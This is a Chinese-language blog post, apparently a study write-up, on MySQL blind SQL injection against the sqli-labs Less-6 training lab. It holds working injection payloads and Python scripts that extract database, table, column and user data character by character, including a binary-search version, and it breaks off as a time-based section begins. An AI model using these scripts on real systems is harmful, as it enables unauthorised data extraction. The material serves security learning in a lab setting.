<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Web安全,数据库,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="起源是上交高校运维比赛（EIS_CTF）其中的一道盲注题，所以使用sqli-labs进行一个复习，权当是盲注的一个复习。">
<meta name="keywords" content="Web安全,数据库">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL-盲注浅析">
<meta property="og:url" content="http://rcoil.me/2017/11/MySQL-盲注浅析/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="起源是上交高校运维比赛（EIS_CTF）其中的一道盲注题，所以使用sqli-labs进行一个复习，权当是盲注的一个复习。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://rcoil.me/image/MySQL-盲注浅析/sqli_labs_6_1.png">
<meta property="og:image" content="http://rcoil.me/image/MySQL-盲注浅析/sqli_labs_6_2.png">
<meta property="og:image" content="http://rcoil.me/image/MySQL-盲注浅析/sqli_labs_6_3.png">
<meta property="og:image" content="http://rcoil.me/image/MySQL-盲注浅析/sqli_labs_6_4.png">
<meta property="og:updated_time" content="2018-04-18T02:07:40.757Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MySQL-盲注浅析">
<meta name="twitter:description" content="起源是上交高校运维比赛（EIS_CTF）其中的一道盲注题，所以使用sqli-labs进行一个复习，权当是盲注的一个复习。">
<meta name="twitter:image" content="http://rcoil.me/image/MySQL-盲注浅析/sqli_labs_6_1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://rcoil.me/2017/11/MySQL-盲注浅析/">





  <title> MySQL-盲注浅析 | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://rcoil.me/2017/11/MySQL-盲注浅析/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                MySQL-盲注浅析
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-11-04T14:38:39+08:00">
                2017-11-04
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/11/MySQL-盲注浅析/" class="leancloud_visitors" data-flag-title="MySQL-盲注浅析">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>起源是上交高校运维比赛（EIS_CTF）其中的一道盲注题，所以使用sqli-labs进行一个复习，权当是盲注的一个复习。<br><a id="more"></a></p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>所有的测试均为无WAF的情况下进行。</p>
<h2 id="注释关键字"><a href="#注释关键字" class="headerlink" title="注释关键字"></a>注释关键字</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">--   # 单行注释，两个-连接符后面紧跟着一个空格</span><br><span class="line">#	 # 单行注释</span><br><span class="line">/**/ # 多行注释</span><br></pre></td></tr></table></figure>
<p>实践效果：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SELECT username,password FROM `users` WHERE id = &apos;2&apos;#&apos; LIMIT 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----------+------------+</span><br><span class="line">| username | password   |</span><br><span class="line">+----------+------------+</span><br><span class="line">| Angelina | I-kill-you |</span><br><span class="line">+----------+------------+</span><br><span class="line">1 row in set</span><br><span class="line"></span><br><span class="line">mysql&gt; SELECT username,password FROM `users` WHERE id = &apos;2&apos;-- &apos; LIMIT 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----------+------------+</span><br><span class="line">| username | password   |</span><br><span class="line">+----------+------------+</span><br><span class="line">| Angelina | I-kill-you |</span><br><span class="line">+----------+------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure></p>
<p>都是可以正常得到查询的结果<br>说明后面的SQL语句已经被我们注释掉了</p>
<h2 id="Sql注入截取字符串常用函数"><a href="#Sql注入截取字符串常用函数" class="headerlink" title="Sql注入截取字符串常用函数"></a>Sql注入截取字符串常用函数</h2><p>在不回显的情况下，多数情况下都会用到截取字符串的问题，也就是在盲注的情况下，需要一个一个字符的去猜解，其中就需要截取字符串。</p>
<h3 id="mid-函数"><a href="#mid-函数" class="headerlink" title="mid()函数"></a>mid()函数</h3><p>语法为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT MID(column_name,start[,length]) FROM table_name;</span><br></pre></td></tr></table></figure></p>
<ul>
<li>column_name    必需。要提取字符的字段。<ul>
<li>start         必需。规定开始位置（起始值是 1）。<ul>
<li>length可选。要返回的字符数。如果省略，则 MID() 函数返回剩余文本。<br>我们就直接使用<code>sqli-labs</code>的数据库进行演示。<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">database()为security </span><br><span class="line">mysql&gt; select mid(database(),1,4);</span><br><span class="line">+---------------------+</span><br><span class="line">| mid(database(),1,4) |</span><br><span class="line">+---------------------+</span><br><span class="line">| secu                |</span><br><span class="line">+---------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>其中<code>column_name</code>内容可为自行构造的sql语句。</p>
<h3 id="substr-函数"><a href="#substr-函数" class="headerlink" title="substr()函数"></a>substr()函数</h3><p>语法为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT SUBSTR(column_name,start[,length]) FROM table_name;</span><br></pre></td></tr></table></figure></p>
<p>描述和用法与<code>mid()</code>函数是一样的<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1);</span><br><span class="line">+--------------------------------------------------------------------------------------------------------+</span><br><span class="line">| substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1) |</span><br><span class="line">+--------------------------------------------------------------------------------------------------------+</span><br><span class="line">| e                                                                                                      |</span><br><span class="line">+--------------------------------------------------------------------------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure></p>
<h3 id="Left-函数"><a href="#Left-函数" class="headerlink" title="Left()函数"></a>Left()函数</h3><p>语法为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LEFT(ARG,LENGTH) FROM table_name;</span><br></pre></td></tr></table></figure></p>
<p>取一个字符串的前若干位<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select left(database(),4);</span><br><span class="line">+--------------------+</span><br><span class="line">| left(database(),4) |</span><br><span class="line">+--------------------+</span><br><span class="line">| secu               |</span><br><span class="line">+--------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure></p>
<h1 id="布尔SQL盲注"><a href="#布尔SQL盲注" class="headerlink" title="布尔SQL盲注"></a>布尔SQL盲注</h1><p>用sqli-labs的第6题作为例子<br><img src="/image/MySQL-盲注浅析/sqli_labs_6_1.png" alt="sqli_labs_6_1"></p>
<p>先手工fuzz一下。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.100/sqli-labs/Less-6/?id=-1</span><br><span class="line">http://192.168.2.100/sqli-labs/Less-6/?id=1&apos;</span><br><span class="line">http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;</span><br></pre></td></tr></table></figure></p>
<p><code>&quot;</code>报错，继续fuzz<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;and&quot;1&quot;=&quot;1</span><br><span class="line">http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;and&quot;1&quot;=&quot;2</span><br></pre></td></tr></table></figure></p>
<p>存在注入，但是没有回显，判断为可盲注。<br>测试一下(其实盲注的脚本真的就只是这几行，难度无非是在waf过滤函数的替换绕过)。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"># ! usr/bin/env python</span><br><span class="line">#  -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;&apos;</span><br><span class="line">print(&quot;获取数据库长度&quot;)</span><br><span class="line">for i in range(1, 32):</span><br><span class="line">    payload = &quot;and length(database())=%d--+&quot; % i</span><br><span class="line">    res = requests.get(url + payload)</span><br><span class="line">    if &quot;You are in...........&quot; in res.text:</span><br><span class="line">        print(&quot;[+]数据库长度为:&quot; + str(i) + &quot;位&quot;)</span><br><span class="line">        break</span><br><span class="line">结果为</span><br><span class="line">/usr/bin/python2.7 /home/rcoil/PycharmProjects/demo/demo.py</span><br><span class="line">获取数据库长度</span><br><span class="line">[+]数据库长度为:8位</span><br><span class="line"></span><br><span class="line">Process finished with exit code 0</span><br></pre></td></tr></table></figure></p>
<p>所以证明注入确实存在且为盲注,浏览器验证下。<br><img src="/image/MySQL-盲注浅析/sqli_labs_6_2.png" alt="sqli_labs_6_2"></p>
<h2 id="获取数据库名字"><a href="#获取数据库名字" class="headerlink" title="获取数据库名字"></a>获取数据库名字</h2><p>先测试（fuzz）<br><img src="/image/MySQL-盲注浅析/sqli_labs_6_3.png" alt="sqli_labs_6_3"><br>发现是可行的。然后写脚本进行猜解。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># ! usr/bin/env python</span><br><span class="line">#  -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;&apos;</span><br><span class="line">print(&quot;获取数据库名字&quot;)</span><br><span class="line">database = &apos;&apos;</span><br><span class="line">for i in range(1, 10):</span><br><span class="line">    for j in range(97, 123):</span><br><span class="line">        payload = &quot;and mid(database(),1,%d)=&apos;%s&apos;--+&quot; % (i, database + chr(j))</span><br><span class="line">        res = requests.get(url + payload)</span><br><span class="line">        if &quot;You are in...........&quot; in res.text:</span><br><span class="line">            database += chr(j)</span><br><span class="line">            print(&quot;[-]当前猜解:&quot; +database)</span><br><span class="line">            break</span><br><span class="line">print(&quot;[+]当前数据库:&quot; +database)</span><br></pre></td></tr></table></figure></p>
<p>如果出现编码问题，要注意的是<code>headers</code>中<code>Content-Type</code>的值，必要的时候带入<code>headers</code>进行访问</p>
<h2 id="获取表名"><a href="#获取表名" class="headerlink" title="获取表名"></a>获取表名</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select mid((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,2);</span><br><span class="line">+-----------------------------------------------------------------------------------------------------+</span><br><span class="line">| mid((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,2) |</span><br><span class="line">+-----------------------------------------------------------------------------------------------------+</span><br><span class="line">| em                                                                                                  |</span><br><span class="line">+-----------------------------------------------------------------------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>
<p>所以接下来代码为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># ! usr/bin/env python</span><br><span class="line">#  -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;&apos;</span><br><span class="line">table_names = &apos;&apos;</span><br><span class="line">for i in range(0, 8):</span><br><span class="line">    for k in range(1, 32):</span><br><span class="line">        for j in range(97, 123):</span><br><span class="line">            payload = &quot;and mid((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit %d,1),1,%d)=&apos;%s&apos;--+&quot; % (i, k, table_names+chr(j))</span><br><span class="line">            request = requests.get(url + payload)</span><br><span class="line">            if &quot;You are in&quot; in request.text:</span><br><span class="line">                table_names += chr(j)</span><br><span class="line">                print(&quot;第&quot; + str(i + 1) + &quot;张表的名字为&quot; + table_names)</span><br><span class="line">                break</span><br></pre></td></tr></table></figure></p>
<p>我发现，如果想要优雅一些，用<code>ascii()</code>或者改变<code>k</code>的位置<br>比如<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and ascii(mid((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit %d,1),%d,1))=&apos;%d&apos;--+&quot; % (i, k, j)</span><br></pre></td></tr></table></figure></p>
<p>但是这样子的话，到最后，所有的<code>table_names</code>都拼接一起（后面补充）。</p>
<h2 id="获取列名"><a href="#获取列名" class="headerlink" title="获取列名"></a>获取列名</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select mid((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 1,1),1,4);</span><br><span class="line">+------------------------------------------------------------------------------------------------------------------------------+</span><br><span class="line">| mid((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit 1,1),1,4) |</span><br><span class="line">+------------------------------------------------------------------------------------------------------------------------------+</span><br><span class="line">| user                                                                                                                         |</span><br><span class="line">+------------------------------------------------------------------------------------------------------------------------------+</span><br><span class="line">1 row in set</span><br></pre></td></tr></table></figure>
<p>代码和上面的没区别<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># ! usr/bin/env python</span><br><span class="line">#  -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;&apos;</span><br><span class="line">column_names = &apos;&apos;</span><br><span class="line">for i in range(0, 8):</span><br><span class="line">    for k in range(1, 32):</span><br><span class="line">        for j in range(97, 123):</span><br><span class="line">            payload = &quot;and ascii(mid((select column_name from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;users&apos; limit %d,1),%d,1))=&apos;%d&apos;--+&quot; % (i, k, j)</span><br><span class="line">            request = requests.get(url + payload)</span><br><span class="line">            if &quot;You are in&quot; in request.text:</span><br><span class="line">                column_names += chr(j)</span><br><span class="line">                print(&quot;第&quot; + str(i + 1) + &quot;列字段名为&quot; + column_names)</span><br><span class="line">                break</span><br></pre></td></tr></table></figure></p>
<h2 id="爆字段"><a href="#爆字段" class="headerlink" title="爆字段"></a>爆字段</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"># ! usr/bin/env python</span><br><span class="line">#  -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &apos;http://192.168.2.100/sqli-labs/Less-6/?id=1&quot;&apos;</span><br><span class="line">column_names = &apos;&apos;</span><br><span class="line">for i in range(0, 8):</span><br><span class="line">    for k in range(1, 32):</span><br><span class="line">        for j in range(21, 127):</span><br><span class="line">            payload = &quot;and ascii(mid((select username from security.users limit %d,1),%d,1))=&apos;%d&apos;--+&quot; % (i, k, j)</span><br><span class="line">            request = requests.get(url + payload)</span><br><span class="line">            if &quot;You are in&quot; in request.text:</span><br><span class="line">                column_names += chr(j)</span><br><span class="line">                print(&quot;第&quot; + str(i + 1) + &quot;行数据为&quot; + column_names)</span><br><span class="line">                break</span><br></pre></td></tr></table></figure>
<p>这个布尔SQL盲注暂时分析到这里。如果想要一脚本搞定以上所有的内容，那就<code>def</code>一下就很方便调用了。<br>写到这里的时候，我发现，所有的脚本都有很多的相同点，只需要更换变量就可以直接使用。而且，在去翻资料的过程中，我发现在bool盲注中二分法比穷举要快一些，所以我参照王一航的思路进行改写。<br><img src="/image/MySQL-盲注浅析/sqli_labs_6_4.png" alt="sqli_labs_6_4"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># encoding:utf8</span><br><span class="line">import requests</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">url = &quot;http://192.168.2.100/sqli-labs/Less-6/?id=&quot;</span><br><span class="line"></span><br><span class="line"># 定义payload</span><br><span class="line">def exce(database_name, table_name, column_name, Result, Char, mid):</span><br><span class="line">    global url</span><br><span class="line">    esndStr = &quot; and\&quot;1\&quot;=\&quot;1&quot;</span><br><span class="line">    payload = &quot;1\&quot;and(ascii(mid((select &quot; + column_name + &quot; from &quot; + database_name + &quot;.&quot; + table_name + &quot;  limit &quot; + Result + &quot;,1),&quot; + Char + &quot;,1))&gt;&quot; + mid + &quot;)&quot;</span><br><span class="line">    tempurl = url + payload + esndStr</span><br><span class="line">    request = requests.get(tempurl).text</span><br><span class="line">    if &quot;You are in...........&quot; in request:</span><br><span class="line">        return True</span><br><span class="line">    else:</span><br><span class="line">        return False</span><br><span class="line"></span><br><span class="line"># 二分查询</span><br><span class="line">def doubleSearch(database_name, table_name, column_name, Result, Char, left_number, right_number):</span><br><span class="line">    while left_number &lt; right_number:</span><br><span class="line">        mid = int((left_number + right_number) / 2)</span><br><span class="line">        if exce(database_name, table_name, column_name, str(Result),str(Char + 1),str(mid)):</span><br><span class="line">            left_number = mid</span><br><span class="line">        else:</span><br><span class="line">            right_number = mid</span><br><span class="line">        if right_number-left_number == 1:</span><br><span class="line">            if exce(database_name, table_name, column_name, str(Result),str(Char + 1),str(mid)):</span><br><span class="line">                mid += 1</span><br><span class="line">                break</span><br><span class="line">            else:</span><br><span class="line">                break</span><br><span class="line">    return chr(mid)</span><br><span class="line"></span><br><span class="line"># 定义所有变量初始</span><br><span class="line">def getAllData(database_name, table_name, column_name):</span><br><span class="line">    for i in range(32):</span><br><span class="line">        counter = 0</span><br><span class="line">        for j in range(32):</span><br><span class="line">            counter += 1</span><br><span class="line">            temp = doubleSearch(database_name, table_name, column_name, i, j, 0, 127) # 从255开始查询</span><br><span class="line">            if ord(temp) == 1:</span><br><span class="line">                break</span><br><span class="line"></span><br><span class="line">            sys.stdout.write(temp)</span><br><span class="line">            sys.stdout.flush()</span><br><span class="line">        if counter == 1: </span><br><span class="line">            break</span><br><span class="line">        sys.stdout.write(&quot;\r\n&quot;)</span><br><span class="line">        sys.stdout.flush()</span><br><span class="line"></span><br><span class="line">def getAllSchemaNames():</span><br><span class="line">    return getAllData(column_name=&quot;schema_name&quot;, table_name=&quot;schemata&quot;, database_name=&quot;information_schema&quot;)</span><br><span class="line">getAllSchemaNames()</span><br></pre></td></tr></table></figure></p>
<p>大致思想：<br>1、mid为left和right的中间值，mid是否和left相等（right-left=1），相等跳到5，如果不等跳到2<br>2、请求mid，如果返回正确的页面跳到3，如果返回错误的页面跳到4<br>3、返回页面正确，将left赋值为mid<br>4、返回页面错误，将right赋值为mid<br>5、返回mid值</p>
<p>二分法它的原理是把可能出现的字符看做一个有序的序列，这样在查找所要查找的元素时,首先与序列中间的元素进行比较,如果大于这个元素,就在当前序列的后半部分继续查找,如果小于这个元素,就在当前序列的前半部分继续查找,直到找到相同的元素,或者所查找的序列范围为空为止。</p>
<p>如果需要查找数据表和数据表的内容，在<code>getAllSchemaNames()</code>添加个<code>where语句</code></p>
<h1 id="时间的SQL盲注"><a href="#时间的SQL盲注" class="headerlink" title="时间的SQL盲注"></a>时间的SQL盲注</h1><p>延时注入是主要针对页面无变化、无法用布尔真假判断、无法报错的情况下的注入技术。</p>
<p>延迟注入主要点是在于<code>if()函数</code>的判断、<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(condition,true,false)               //条件语句</span><br></pre></td></tr></table></figure></p>
<ul>
